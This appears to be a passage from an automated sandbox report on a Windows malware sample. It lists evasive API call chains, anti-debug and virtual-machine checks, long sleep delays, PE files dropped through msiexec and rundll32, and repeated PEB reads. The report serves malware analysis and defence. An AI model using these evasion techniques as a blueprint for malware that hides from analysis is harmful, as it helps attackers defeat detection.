                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-45405
                  Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_5-45936
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetAdaptersInfo,5_2_7FB2B260
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICC41.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICCA1.tmpJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICA2D.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\8f08\724536\724536.winmdJump to dropped file
                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICC71.tmpJump to dropped file
                  Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 5.4 %
                  Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 3.0 %
                  Source: C:\Windows\System32\msiexec.exe TID: 6528Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exe TID: 6436Thread sleep count: 54 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exe TID: 6436Thread sleep time: -7020000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB57CC4 FindFirstFileExW,5_2_7FB57CC4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2ADB0 GetSystemInfo,5_2_7FB2ADB0
                  Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 130000Jump to behavior
                  Source: rundll32.exe, 00000005.00000002.3321908907.00000000027CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-45378
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB41417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_7FB41417
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB09830 mov edx, dword ptr fs:[00000030h]5_2_7FB09830
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB13740 mov ecx, dword ptr fs:[00000030h]5_2_7FB13740
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB13740 mov ecx, dword ptr fs:[00000030h]5_2_7FB13740
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB13740 mov eax, dword ptr fs:[00000030h]5_2_7FB13740
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB13740 mov edx, dword ptr fs:[00000030h]5_2_7FB13740
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB27660 mov ecx, dword ptr fs:[00000030h]5_2_7FB27660
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2B260 mov ecx, dword ptr fs:[00000030h]5_2_7FB2B260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2B260 mov eax, dword ptr fs:[00000030h]5_2_7FB2B260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2B260 mov edx, dword ptr fs:[00000030h]5_2_7FB2B260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2B260 mov eax, dword ptr fs:[00000030h]5_2_7FB2B260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2B260 mov ecx, dword ptr fs:[00000030h]5_2_7FB2B260
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2ADB0 mov edx, dword ptr fs:[00000030h]5_2_7FB2ADB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3CDA9 mov eax, dword ptr fs:[00000030h]5_2_7FB3CDA9
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3CDA9 mov ecx, dword ptr fs:[00000030h]5_2_7FB3CDA9
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB30C00 mov ecx, dword ptr fs:[00000030h]5_2_7FB30C00
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2E690 mov ecx, dword ptr fs:[00000030h]5_2_7FB2E690
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov edx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov eax, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov eax, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov edx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov eax, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov eax, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov edx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov ecx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov eax, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB34390 mov edx, dword ptr fs:[00000030h]5_2_7FB34390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2E1C0 mov edx, dword ptr fs:[00000030h]5_2_7FB2E1C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]5_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB0 mov edx, dword ptr fs:[00000030h]5_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]5_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]5_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]5_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]5_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]5_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB0 mov ecx, dword ptr fs:[00000030h]5_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB0 mov edx, dword ptr fs:[00000030h]5_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB21EB0 mov eax, dword ptr fs:[00000030h]5_2_7FB21EB0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB25EC0 mov ecx, dword ptr fs:[00000030h]5_2_7FB25EC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB37D90 mov ecx, dword ptr fs:[00000030h]5_2_7FB37D90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB37D90 mov edx, dword ptr fs:[00000030h]5_2_7FB37D90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB37D90 mov eax, dword ptr fs:[00000030h]5_2_7FB37D90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB37D90 mov ecx, dword ptr fs:[00000030h]5_2_7FB37D90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3DDF9 mov eax, dword ptr fs:[00000030h]5_2_7FB3DDF9
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov ecx, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov ecx, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov ecx, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov edx, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov ecx, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov eax, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1FD40 mov ecx, dword ptr fs:[00000030h]5_2_7FB1FD40
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB15CD0 mov ecx, dword ptr fs:[00000030h]5_2_7FB15CD0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB29A90 mov eax, dword ptr fs:[00000030h]5_2_7FB29A90
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov edx, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov eax, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1DAC0 mov ecx, dword ptr fs:[00000030h]5_2_7FB1DAC0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB0DA10 mov edx, dword ptr fs:[00000030h]5_2_7FB0DA10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB0DA10 mov eax, dword ptr fs:[00000030h]5_2_7FB0DA10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB57A0D mov eax, dword ptr fs:[00000030h]5_2_7FB57A0D
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB57998 mov eax, dword ptr fs:[00000030h]5_2_7FB57998
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB579DC mov eax, dword ptr fs:[00000030h]5_2_7FB579DC
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3D7A5 mov eax, dword ptr fs:[00000030h]5_2_7FB3D7A5
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB0D6C0 mov edx, dword ptr fs:[00000030h]5_2_7FB0D6C0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3F610 mov eax, dword ptr fs:[00000030h]5_2_7FB3F610
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3D47E mov eax, dword ptr fs:[00000030h]5_2_7FB3D47E
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2D3E0 mov ecx, dword ptr fs:[00000030h]5_2_7FB2D3E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2D3E0 mov eax, dword ptr fs:[00000030h]5_2_7FB2D3E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2D3E0 mov ecx, dword ptr fs:[00000030h]5_2_7FB2D3E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2D3E0 mov edx, dword ptr fs:[00000030h]5_2_7FB2D3E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2D3E0 mov eax, dword ptr fs:[00000030h]5_2_7FB2D3E0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB0D370 mov edx, dword ptr fs:[00000030h]5_2_7FB0D370
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB072D0 mov edx, dword ptr fs:[00000030h]5_2_7FB072D0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3D039 mov eax, dword ptr fs:[00000030h]5_2_7FB3D039
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB08F30 mov edx, dword ptr fs:[00000030h]5_2_7FB08F30
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB08F30 mov ecx, dword ptr fs:[00000030h]5_2_7FB08F30
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB08F30 mov ecx, dword ptr fs:[00000030h]5_2_7FB08F30
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB06F1A mov eax, dword ptr fs:[00000030h]5_2_7FB06F1A
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2AF60 mov eax, dword ptr fs:[00000030h]5_2_7FB2AF60
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3CE97 mov eax, dword ptr fs:[00000030h]5_2_7FB3CE97
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB06E80 mov eax, dword ptr fs:[00000030h]5_2_7FB06E80
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB18E10 mov edx, dword ptr fs:[00000030h]5_2_7FB18E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB18E10 mov edx, dword ptr fs:[00000030h]5_2_7FB18E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB18E10 mov edx, dword ptr fs:[00000030h]5_2_7FB18E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB18E10 mov eax, dword ptr fs:[00000030h]5_2_7FB18E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB18E10 mov edx, dword ptr fs:[00000030h]5_2_7FB18E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB18E10 mov ecx, dword ptr fs:[00000030h]5_2_7FB18E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB18E10 mov ecx, dword ptr fs:[00000030h]5_2_7FB18E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB18E10 mov ecx, dword ptr fs:[00000030h]5_2_7FB18E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB18E10 mov edx, dword ptr fs:[00000030h]5_2_7FB18E10
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3CE02 mov eax, dword ptr fs:[00000030h]5_2_7FB3CE02
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB3CE45 mov eax, dword ptr fs:[00000030h]5_2_7FB3CE45
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB06C70 mov edx, dword ptr fs:[00000030h]5_2_7FB06C70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB12A20 mov eax, dword ptr fs:[00000030h]5_2_7FB12A20
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A800 mov ecx, dword ptr fs:[00000030h]5_2_7FB1A800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A800 mov ecx, dword ptr fs:[00000030h]5_2_7FB1A800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]5_2_7FB1A800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]5_2_7FB1A800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]5_2_7FB1A800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]5_2_7FB1A800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]5_2_7FB1A800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]5_2_7FB1A800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A800 mov eax, dword ptr fs:[00000030h]5_2_7FB1A800
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB38870 mov ecx, dword ptr fs:[00000030h]5_2_7FB38870
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB38870 mov edx, dword ptr fs:[00000030h]5_2_7FB38870
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB38870 mov eax, dword ptr fs:[00000030h]5_2_7FB38870
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB38870 mov ecx, dword ptr fs:[00000030h]5_2_7FB38870
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB047D4 mov ecx, dword ptr fs:[00000030h]5_2_7FB047D4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB047D4 mov ecx, dword ptr fs:[00000030h]5_2_7FB047D4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB047D4 mov edx, dword ptr fs:[00000030h]5_2_7FB047D4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB507C8 mov ecx, dword ptr fs:[00000030h]5_2_7FB507C8
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB0E5A0 mov eax, dword ptr fs:[00000030h]5_2_7FB0E5A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2A560 mov ecx, dword ptr fs:[00000030h]5_2_7FB2A560
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2A560 mov eax, dword ptr fs:[00000030h]5_2_7FB2A560
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2A560 mov ecx, dword ptr fs:[00000030h]5_2_7FB2A560
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB12420 mov edx, dword ptr fs:[00000030h]5_2_7FB12420
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB12420 mov eax, dword ptr fs:[00000030h]5_2_7FB12420
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2E3A0 mov eax, dword ptr fs:[00000030h]5_2_7FB2E3A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB14392 mov edx, dword ptr fs:[00000030h]5_2_7FB14392
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB04280 mov edx, dword ptr fs:[00000030h]5_2_7FB04280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB04280 mov ecx, dword ptr fs:[00000030h]5_2_7FB04280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB04280 mov ecx, dword ptr fs:[00000030h]5_2_7FB04280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB04280 mov ecx, dword ptr fs:[00000030h]5_2_7FB04280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB04280 mov ecx, dword ptr fs:[00000030h]5_2_7FB04280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB04280 mov edx, dword ptr fs:[00000030h]5_2_7FB04280
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB042E4 mov edx, dword ptr fs:[00000030h]5_2_7FB042E4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB042E4 mov ecx, dword ptr fs:[00000030h]5_2_7FB042E4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB0E250 mov edx, dword ptr fs:[00000030h]5_2_7FB0E250
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2E1B0 mov eax, dword ptr fs:[00000030h]5_2_7FB2E1B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB2C170 mov eax, dword ptr fs:[00000030h]5_2_7FB2C170
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1C160 mov edx, dword ptr fs:[00000030h]5_2_7FB1C160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1C160 mov ecx, dword ptr fs:[00000030h]5_2_7FB1C160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]5_2_7FB1C160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]5_2_7FB1C160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]5_2_7FB1C160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]5_2_7FB1C160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]5_2_7FB1C160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1C160 mov edx, dword ptr fs:[00000030h]5_2_7FB1C160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1C160 mov eax, dword ptr fs:[00000030h]5_2_7FB1C160
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A0A4 mov ecx, dword ptr fs:[00000030h]5_2_7FB1A0A4
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FB1A0A4 mov edx, dword ptr fs:[00000030h]5_2_7FB1A0A4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F813740 mov ecx, dword ptr fs:[00000030h]7_2_7F813740
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F813740 mov ecx, dword ptr fs:[00000030h]7_2_7F813740
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F813740 mov eax, dword ptr fs:[00000030h]7_2_7F813740
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F813740 mov edx, dword ptr fs:[00000030h]7_2_7F813740
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F806F1A mov eax, dword ptr fs:[00000030h]7_2_7F806F1A
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F808F30 mov edx, dword ptr fs:[00000030h]7_2_7F808F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F808F30 mov ecx, dword ptr fs:[00000030h]7_2_7F808F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F808F30 mov ecx, dword ptr fs:[00000030h]7_2_7F808F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F82AF60 mov eax, dword ptr fs:[00000030h]7_2_7F82AF60
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F806E80 mov eax, dword ptr fs:[00000030h]7_2_7F806E80
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]7_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB0 mov edx, dword ptr fs:[00000030h]7_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]7_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]7_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]7_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]7_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]7_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB0 mov ecx, dword ptr fs:[00000030h]7_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB0 mov edx, dword ptr fs:[00000030h]7_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F821EB0 mov eax, dword ptr fs:[00000030h]7_2_7F821EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_7F825EC0 mov ecx, dword ptr fs:[00000030h]7_2_7F825EC0
